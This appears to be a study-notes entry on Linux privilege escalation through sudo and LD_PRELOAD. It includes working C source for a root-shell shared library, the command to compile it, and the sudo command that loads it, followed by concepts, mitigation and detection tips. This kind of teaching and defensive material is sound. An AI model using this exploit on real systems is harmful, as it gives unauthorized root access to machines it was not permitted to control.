19.Shared-libraries

Check Sudo Privileges

sudo -l

Create Malicious Shared Library (root.c)

cat > root.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF

Compile Shared Library

gcc -fPIC -shared -o root.so root.c -nostartfiles

Exploit LD_PRELOAD (replace with actual sudo command)

sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

Verify Root Access

id
whoami

Example Using LD_LIBRARY_PATH (Less Common, but Possible)

# Create a malicious library in a directory you control
# Compile it like above
# LD_LIBRARY_PATH=/path/to/malicious/lib sudo /path/to/vulnerable/binary

List Shared Library Dependencies

ldd /bin/ls

Key Concepts:

• Shared Libraries (.so):

  • Dynamically linked libraries used by programs.

  • Can be modified to alter program behavior.

• LD_PRELOAD:

  • Environment variable that loads a library before others.

  • Allows overriding functions in other libraries.

• ldd:

  • Utility to list a program's shared library dependencies.

• Sudo and LD_PRELOAD:

  • If sudo allows LD_PRELOAD to be kept in the environment, it can be exploited.

Exploitation Steps (as described):

1. Identify Sudo Privileges:

   • sudo -l: Check for commands the user can run as root.

   • Look for commands that can be exploited with LD_PRELOAD.

2. Create Malicious Shared Library:

   • Write C code to execute a shell as root.

   • Use _init() to ensure the code executes when the library is loaded.

   • Use unsetenv("LD_PRELOAD"); to clean up the environment to avoid issues with child processes.

3. Compile Shared Library:

   • gcc -fPIC -shared -o root.so root.c -nostartfiles

4. Exploit LD_PRELOAD:

   • sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart (replace with the correct path and sudo command)

5. Verify Root Access:

   • id

Important Considerations and Enhancements:

• Sudo Configuration:

  • The env_keep+=LD_PRELOAD in /etc/sudoers is crucial for this exploit.

  • Many systems will clean the environment.

• Library Loading Order:

  • LD_PRELOAD takes precedence over other library loading mechanisms.

• Function Overriding:

  • LD_PRELOAD can be used to override specific functions in other libraries.

• Security Implications:

  • This is a significant security risk.

  • Proper sudo configuration is essential.

• Mitigation:

  • Remove env_keep+=LD_PRELOAD from /etc/sudoers.

  • Use secure paths in sudo configurations.

  • Regularly audit sudo configurations.

• Detection:

  • Monitor for unexpected LD_PRELOAD usage.

  • Audit sudo configurations.

  • Use intrusion detection systems.

• Real world examples: Researching real world LD_PRELOAD exploits will help solidify understanding of the attack vectors.

• Other environment variables: Other environment variables can be missused, such as LD_LIBRARY_PATH.